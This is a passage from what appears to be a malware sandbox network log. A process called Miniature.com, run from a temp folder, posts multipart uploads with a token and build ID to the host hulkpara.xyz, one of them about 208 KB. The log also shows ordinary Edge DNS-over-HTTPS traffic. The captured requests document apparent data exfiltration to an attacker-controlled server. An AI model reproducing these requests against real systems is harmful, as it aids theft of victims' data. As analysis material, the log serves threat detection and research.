                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:45 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:47 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          14192.168.2.74974194.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:46 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----USR1N7QIEU37YUAS2V3W
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 493
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:46 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 55 53 52 31 4e 37 51 49 45 55 33 37 59 55 41 53 32 56 33 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------USR1N7QIEU37YUAS2V3WContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------USR1N7QIEU37YUAS2V3WCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:47 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          15192.168.2.74976094.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:53 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8G4OP8G4WTRIMY5XTR1D
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 3161
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:53 UTC3161OUTData Raw: 2d 2d 2d 2d 2d 2d 38 47 34 4f 50 38 47 34 57 54 52 49 4d 59 35 58 54 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 38 47 34 4f 50 38 47 34 57 54 52 49 4d 59 35 58 54 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 38 47 34 4f 50 38 47 34 57 54 52 49 4d 59 35 58 54 52 31 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------8G4OP8G4WTRIMY5XTR1DContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------8G4OP8G4WTRIMY5XTR1DContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8G4OP8G4WTRIMY5XTR1DCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:54 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          16192.168.2.749772162.159.61.34431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:54 GMT
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                          CF-RAY: 8f4597be1f580f7d-EWR
                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1b 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          17192.168.2.749781162.159.61.34431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:54 GMT
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                          CF-RAY: 8f4597be2c0942db-EWR
                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          18192.168.2.749782172.64.41.34431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:54 GMT
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                          CF-RAY: 8f4597be2b124201-EWR
                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:55 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2c 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom,Pc)


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          19192.168.2.74977094.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----9RIW4ECJ5XBAAI58QIEC
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 207993
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 39 52 49 57 34 45 43 4a 35 58 42 41 41 49 35 38 51 49 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------9RIW4ECJ5XBAAI58QIECContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------9RIW4ECJ5XBAAI58QIECContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------9RIW4ECJ5XBAAI58QIECCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
